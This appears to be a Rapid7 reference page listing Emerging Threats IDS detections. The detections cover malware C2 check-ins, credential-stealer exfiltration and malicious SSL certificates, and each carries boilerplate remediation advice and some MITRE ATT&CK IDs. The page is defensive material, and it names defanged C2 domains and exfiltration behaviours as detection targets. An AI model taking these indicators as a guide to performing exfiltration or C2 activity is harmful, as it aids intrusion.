Suspicious Network Activity - IDS
Copy link

ET HUNTING Suspicious EXE Download Content-Type image/jpeg

These detections identify suspicious activity from network sessions evaluated by Insight Network Sensor.

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Adobe PKG Download Flowbit Set

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO ARM File Requested via WGET (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Flowbit set for POST to Quicken Updater

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO GET Minimal HTTP Headers Flowbit Set

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO maas.io Image Download Flowbit Set

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO McAfee AV Download (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO McAfee AV Download - Set

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request (exe) unset (no exe)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request (msi) unset (no exe)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request (msp) unset (no exe)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request (no .exe)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request to Dotted Quad

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible WinHttpRequest (no .exe)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Symantec Download Flowbit Set

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO User-Agent (wininet)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Windows Update/Microsoft FP Flowbit

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO ZoneAlarm Download Flowbit Set

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [401TRG] Backdoor.BEACON SSL Cert Inbound (bigtopweb .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [401TRG] Backdoor.BEACON SSL Cert Inbound (infinitysoftwares .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Observed Backdoor.SUNBURST CnC Domain (bigtopweb .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [401TRG] Observed Backdoor.SUNBURST CnC Domain (infinitysoftwares .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [401TRG] PS/PowDesk Checkin (APT34)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE 404 Response with an EXE Attached - Likely Malware Drop

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE 44Calibar Variant Exfil via Telegram

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE 44 Caliber Stealer Data Exfil via Discord

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Instruction (bigudp)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Instruction (dns)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Instruction (stop)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Instruction (syn)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Bancos/DarkTequila CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Bancos/DarkTequila CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Downloader CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Downloader CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Downloader CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dyre CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Gootkit CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Gootkit MITM)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Gozi MITM)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Quakbot CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL Certificate Detected (Sinkhole)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL Certificate Detected (Sinkhole)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TorrentLocker CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TrickBot CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Vawtrak CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Vawtrak CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Zeus CnC)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Fingerprint Blacklist Malicious SSL Certificate Detected (Gootkit C2)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Fingerprint Blacklist Malicious SSL certificate detected (Likely Shylock/URLzone/Gootkit/Zeus Panda C2)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Fingerprint Blacklist Malicious SSL Certificate Detected (Malware C2)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Fingerprint Blacklist Malicious SSL Certificate Detected (Malware C2)

Description
Copy link

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation
Copy link

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Agent.BAAB Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AgentTesla Communicating with CnC Server

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AgentTesla PWS HTTP CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK/BKDR_HTV.ZKGD-A CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK/BKDR_HTV.ZKGD-A Fake HTTP 500 Containing Encoded Commands Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK.CREDSTEALER.A CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK.CREDSTEALER.A CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK.CREDSTEALER.A MalDoc Retrieving Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alfa/Alpha Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Alina Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alina Server Response Code

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alina User-Agent(Alina)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alman Dropper Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AlphaCrypt CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE AlphaCrypt CnC Beacon 5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE AlphaCrypt CnC Beacon 6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE AlphaCrypt Connectivity Check 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alphacrypt/TeslaCrypt Ransomware CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

